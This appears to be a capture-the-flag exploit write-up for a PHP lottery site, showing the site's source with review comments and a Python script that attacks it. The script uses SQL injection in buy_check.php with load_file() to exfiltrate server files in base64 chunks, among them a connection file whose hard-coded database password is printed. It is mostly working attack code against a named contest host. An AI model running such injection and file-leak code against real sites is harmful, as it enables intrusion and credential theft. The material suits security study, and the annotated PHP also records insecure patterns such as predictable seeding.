Lotto Exploit
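<?php
/**
 * Draw seven distinct lotto numbers in the range 1..77.
 *
 * State lives in ./s3cre7_fi1e, resolved against the process working
 * directory (the other files on this page sit in /var/www/html, so that is
 * presumably where the seed file ends up -- i.e. under the document root).
 * On the first run the file is seeded from uniqid(); on every run the last
 * raw rand() value of the draw is written back as the seed for the next one.
 *
 * SECURITY NOTE (review): srand()/rand() is a deterministic PRNG, so anyone
 * who obtains the seed file -- or who can reconstruct the previous draw's
 * final rand() output, which is exactly what gets stored -- can replay this
 * function and predict the next draw.  That is what the exploit script on
 * this page leaks files to do.  A real lottery must use random_int() and
 * must not persist replayable generator state at all.
 *
 * @return int[] seven distinct numbers in 1..77, in draw (unsorted) order
 */
function generator()
{
    $PATH = "./s3cre7_fi1e";

    // First run: create the seed file.  intval(uniqid(), 10) keeps only the
    // leading decimal digits of uniqid()'s hex string (parsing stops at the
    // first a-f character), so the initial seed carries very little entropy.
    if (!file_exists(realpath($PATH))) {
        $init_seed = intval(uniqid(), 10);
        $f = fopen($PATH, "w");
        fwrite($f, $init_seed);
        fclose($f);
    }

    // Read the persisted seed.  The original fopen()/fread() pair never closed
    // its handle; file_get_contents() reads and closes in one step.
    $data = file_get_contents($PATH);
    $init_seed = $seed = intval($data, 10);
    srand($init_seed);

    // Stir the generator (seed % 100) times.  Each pass reseeds from the
    // product of two draws and consumes two more draws.  The squared
    // middle-digit value computed at the end of the pass is overwritten at
    // the top of the next pass and never fed to srand(), so it has no
    // effect on the output; it is kept so the draw sequence is unchanged.
    for ($i = 0; $i < $init_seed % 100; $i++) {
        $seed = rand() * rand();
        srand($seed);
        $tmp = rand() * rand();
        $length = strlen($tmp);
        $cutting = (int)($length / 4);
        $tmp2 = substr($seed, $cutting, $length - $cutting * 2);
        $seed = $tmp2 * $tmp2;
    }

    // Pick seven distinct numbers.  The original initialised this as
    // array(7) -- a one-element array holding the value 7, not a seven-slot
    // array -- which quietly prevented 7 from ever being drawn in the first
    // position.  Start empty instead.
    $ret = array();
    $new_seed = 0;
    for ($i = 0; $i < 7; $i++) {
        $new_seed = rand();
        $number = ($new_seed % 77) + 1;
        if (in_array($number, $ret)) {
            $i--;   // duplicate: redraw this slot
            continue;
        }
        $ret[$i] = $number;
    }

    // Persist the last raw rand() value as the next run's seed.
    $f = fopen($PATH, "w");
    fwrite($f, $new_seed);
    fclose($f);
    return $ret;
}
?>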
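<?php
/*
 * Round settlement script: draw the numbers, find the winners for the
 * current round, append the result to LOG and record the draw time.
 *
 * The time() gate around the whole body (draw only after 1509576900) is
 * commented out in the original and stays commented out here, so the
 * script settles a round every time it is executed.
 */
include '9en3rat0r.php';
include 'd6conn.php';
//if(time()>1509576900)
//{
### MAKE LOTTO NUMBERS ###
$luckyNumber = generator();
sort($luckyNumber);
$luckyNumber = implode(",", $luckyNumber);   // canonical "n,n,n,n,n,n,n" form

### CHECK ROUND ###
$round = getRound($conn);

### CHECK WINNER ###
// $round comes from max(no)+1 in getRound(), not from a request, but cast it
// anyway so the only value interpolated into SQL is guaranteed numeric.
$res = mysqli_query($conn, "SELECT * FROM ATTEMPT WHERE no=" . (int)$round);
$Winners = array();
// mysqli_query() returns false on error; the original handed that straight
// to mysqli_fetch_array().  Skip the loop and log an empty winner list instead.
if ($res !== false) {
    while ($row = mysqli_fetch_array($res)) {
        if ($luckyNumber == $row['numbers'])
            array_push($Winners, $row['name']);
    }
}

### WRITE HISTORY ###
$Winners = implode(",", $Winners);
// SECOND-ORDER SQL INJECTION FIX.  The original built this INSERT by string
// interpolation: values('{$luckyNumber}','{$Winners}').  $Winners is a list
// of ATTEMPT.name values -- data a player stored earlier (the exploit script
// on this page registers arbitrary userids) -- so a name containing a quote
// reached the query unescaped.  Bind both values instead.
$stmt = mysqli_prepare($conn, "INSERT INTO LOG(luckyNumbers,winners) values(?,?)");
if ($stmt !== false) {
    mysqli_stmt_bind_param($stmt, "ss", $luckyNumber, $Winners);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_close($stmt);
}
/* Author's note kept from the original.  The $.post line was a paste
 * artefact from the Python exploit on this page (it ends in a Python """),
 * not PHP, and would not have parsed; it is preserved here as a comment.
 * Winners = Sakuya
 * "1":"1',3,(SELECT winners FROM LOG WHERE winners=winners LIMIT 1))-- -",
 * $.post("/buy_check.php", d, function(f){ console.log(f) });
 */

### WRITE CURRENT TIME ###
$f = fopen("/var/www/T1M3", "w");
fwrite($f, date("Y-m-d H:i:s"));
fclose($f);
//}
?>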
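<?php
/*
 * Database connection shared by the other scripts (included as d6conn.php).
 *
 * SECURITY NOTE (review): credentials are hard-coded in a file under the
 * document root -- /var/www/html/d6conn.php is precisely what the exploit
 * script on this page reads with load_file().  Any file-read primitive on
 * the host therefore yields the database password.  Keep credentials outside
 * the web root (and out of source control) and read them from the
 * environment or a config file the web server cannot serve.
 */
$HOST = "locaalhost";   // sic -- reproduced as leaked; "localhost" is presumably intended, confirm before changing
$USER = "lo77o";
$PASS = "g0db!essU";
$DB_NAME = "LOTTO";
$conn = mysqli_connect($HOST, $USER, $PASS, $DB_NAME);
// mysqli_connect() returns false on failure.  The original carried on and
// only failed later inside getRound() with a warning from mysqli_query().
// Stop here; log the real reason server-side, but do not echo it to clients.
if ($conn === false) {
    error_log("d6conn: mysqli_connect failed: " . mysqli_connect_error());
    die("database unavailable");
}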
/**
 * Number of the round being settled: one more than the highest LOG.no so
 * far, or 1 when LOG is still empty (max() yields NULL, which the loose
 * == "" comparison maps to 0).
 *
 * @param mysqli $conn open database connection
 * @return int
 */
function getRound($conn)
{
    $latest = mysqli_fetch_array(mysqli_query($conn, "SELECT max(no)`round` FROM LOG"));
    $highest = $latest['round'];
    if ($highest == "") {
        $highest = 0;
    }
    return $highest + 1;
}
?>
import sys | |
from base64 import * | |
import requests | |
import time | |
"""l = "520"; | |
d = {'65':'65', | |
'23':'23', | |
'45':'45', | |
'74':'74', | |
"1":"1',3,(SELECT to_base64(left(right(load_file('/var/www/html/e57717591ebe1d829b3def08f229a53b.php'),"+l+"),20))))-- -", | |
'5':'5', '6':'6'}; | |
$.post("/buy_check.php", d, function(f){ console.log(f) });""" | |
cookie = "" | |
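def login(u, p, timeout=30):
    """POST credentials to login_check.php and keep the session cookies.

    Stores the response cookie jar in the module-level ``cookie`` so that
    parse_history() and leak() can authenticate, and returns the response
    body (the call site prints it so the operator can see whether the
    login worked).

    Args:
        u: userid to log in as.
        p: password.
        timeout: seconds to wait for the server.  The original passed no
            timeout, so a stalled connection would hang the script forever.
    """
    global cookie
    url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/login_check.php"
    res = requests.post(url, data={'userid': u, 'userpw': p}, timeout=timeout)
    cookie = res.cookies
    return res.text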
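def register(u, p, timeout=30):
    """POST a new account to register_check.php and return the response body.

    Does not touch the session: the original declared ``global cookie`` here
    but never read or wrote it, so the declaration is dropped.  The author's
    note at the call site says duplicate registrations are accepted, so
    re-running this with an existing userid is harmless.

    Args:
        u: userid to create.
        p: password.
        timeout: seconds to wait for the server (the original had none).
    """
    url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/register_check.php"
    res = requests.post(url, data={'userid': u, 'userpw': p}, timeout=timeout)
    return res.text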
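def parse_history_html(html):
    """Return the third cell of every row in the first <tbody> of *html*.

    Mirrors the string splitting the original did inline in parse_history():
    take the first <tbody>...</tbody>, split it on <tr> and drop the text
    before the first row, split each row on <td> and keep cell index 2 up
    to its </td>.  Rows with fewer than three cells raise IndexError, as
    before.  Split out so the parsing can be tested without a session.
    """
    tbody = html.split("<tbody>")[1].split("</tbody>")[0]
    rows = tbody.split("<tr>")[1:]
    cells = [row.split("<td>")[1:] for row in rows]
    return [c[2].split("</td>")[0] for c in cells]


def parse_history(timeout=30):
    """Fetch ?p=history with the session cookie and return its third column.

    For the file leak that column carries the base64 chunk each injected
    buy_check.php row smuggled into the history table (see leak()).  The
    page presumably lists the newest row first, which is why leak_file()
    reverses the result before decoding it.

    Args:
        timeout: seconds to wait for the server (the original had none).
    """
    url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/?p=history"
    res = requests.get(url, cookies=cookie, timeout=timeout)
    return parse_history_html(res.text)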
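def leak_payload(fn, s=20):
    """Build the buy_check.php form body that smuggles a slice of *fn* out.

    The "1" field is injected into the INSERT that buy_check.php performs:
    right(load_file(fn), s) takes the last *s* bytes of the file and
    left(..., 20) the first 20 of those, so one request exfiltrates bytes
    [-s, -s+20) of the file, base64-encoded, into a column the history page
    later displays.  The 20-byte width presumably matches what that column
    can hold (seven two-digit numbers with commas is exactly 20 characters).
    The other six fields look like the remaining picks of a seven-number
    ticket; their values are whatever the original used.

    *fn* is spliced into the SQL string as-is, so it must not contain a
    single quote.
    """
    return {
        '65': '65', '23': '23', '45': '45', '74': '74', '5': '5', '6': '6',
        "1": "1',3,(SELECT to_base64(left(right(load_file('" + fn + "'),"
             + str(s) + "),20))))-- -",
    }


def leak(fn, s=20, timeout=30):
    """Send one leak request; True if the server accepted the purchase.

    "Your luckyNumber" in the response means the injected row was inserted
    and its chunk will appear on the history page.  Any other response is
    reported as False and retried by leak_file().

    Args:
        fn: absolute path of the file to read on the target.
        s: offset from the end of the file, see leak_payload().
        timeout: seconds to wait for the server (the original had none).
    """
    url = "https://309d24f0f1f4d43c7640b02baa5d8667.whitehatcontest.kr/buy_check.php"
    res = requests.post(url, cookies=cookie, data=leak_payload(fn, s), timeout=timeout)
    return "Your luckyNumber" in res.text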
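def leak_file(fn, max_len=8192):
    """Dump *fn* from the target by repeated 20-byte leaks and print it.

    leak(fn, s) exfiltrates bytes [-s, -s+20) of the file, so walking s over
    20, 40, ... reads the file backwards from its end in 20-byte chunks.
    Each request is retried once a second until leak() reports success (the
    original did the same, spelled ``while leak(fn, i) == False``).  Then the
    history page is read, its rows reversed back into file order, and the
    base64 chunks decoded and printed.  Returns None, as before.

    Args:
        fn: absolute path on the target, e.g. /var/www/html/d6conn.php.
        max_len: how far back from the end of the file to read (exclusive,
            matching the original range(20, 8192, 20)).  Chunks that reach
            past the start of the file just repeat its first bytes.
    """
    for offset in range(20, max_len, 20):
        while not leak(fn, offset):
            time.sleep(1)
    print('-------------------')
    chunks = parse_history()[::-1]
    print(''.join([b64decode(k) for k in chunks]))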
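if __name__ == "__main__":
    # Python 2 script in the original (bare print statements).  The calls
    # are wrapped in print() so these lines parse on either major version,
    # and placed under a __main__ guard so importing the helpers above does
    # not fire requests at the target.
    print(register('stypry', 'stypry'))   # duplicate registration possible
    print(login('stypry', 'stypry'))
    #print(leak_file("/var/www/html/e57717591ebe1d829b3def08f229a53b.php"))
    #print(leak_file("/var/www/html/9en3rat0r.php"))
    print(leak_file("/var/www/html/d6conn.php"))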